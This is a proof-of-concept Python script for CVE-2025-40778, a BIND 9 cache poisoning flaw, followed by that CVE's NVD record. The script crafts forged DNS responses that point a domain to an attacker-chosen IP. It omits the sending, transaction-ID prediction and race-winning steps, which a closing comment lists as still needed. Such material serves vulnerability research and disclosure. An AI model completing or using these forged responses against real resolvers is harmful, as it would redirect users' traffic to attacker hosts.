CVE-2025-40778

# CVE-2025-40778 BIND 9 Cache Poisoning PoC # This PoC demonstrates the cache poisoning attack concept import socket import struct import random def build_dns_query(domain): """Build a DNS query packet""" transaction_id = random.randint(0, 65535) flags = 0x0100 # Standard query questions = 1 query = struct.pack('>HHHHHH', transaction_id, flags, questions, 0, 0, 0) for label in domain.split('.'): query += struct.pack('B', len(label)) + label.encode() query += b'\x00' # End of domain name query += struct.pack('>HH', 1, 1) # Type A, Class IN return query def build_poisoned_response(transaction_id, domain, malicious_ip): """Build a malicious DNS response with forged records""" flags = 0x8180 # Response, Authoritative questions = 1 answers = 2 # Include additional forged records # DNS header response = struct.pack('>HHHHHH', transaction_id, flags, questions, answers, 0, 0) # Question section for label in domain.split('.'): response += struct.pack('B', len(label)) + label.encode() response += b'\x00' response += struct.pack('>HH', 1, 1) # Answer section with forged records response += b'\xc0\x0c' # Pointer to domain name response += struct.pack('>HHIH', 1, 1, 300, 4) # Type A, Class IN, TTL, RDLENGTH response += socket.inet_aton(malicious_ip) # Additional section with extra forged records (the leniency issue) response += b'\xc0\x0c' response += struct.pack('>HHIH', 1, 1, 300, 4) response += socket.inet_aton(malicious_ip) return response # Note: Actual exploitation requires: # 1. Prediction of transaction ID # 2. Timing attack to win the race condition # 3. Network position to intercept or spoof DNS queries # 4. exploitation of BIND's lenient record acceptance

{"cve": {"id": "CVE-2025-40778", "sourceIdentifier": "[email protected]", "published": "2025-10-22T16:15:42.520", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Under certain circumstances, BIND is too lenient when accepting records from answers, allowing an attacker to inject forged data into the cache.\nThis issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.39, 9.20.0 through 9.20.13, 9.21.0 through 9.21.12, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.39-S1, and 9.20.9-S1 through 9.20.13-S1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-349"}]}], "references": [{"url": "https://kb.isc.org/docs/cve-2025-40778", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/22/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://gist.github.com/N3mes1s/f76b4a606308937b0806a5256bc1f918", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}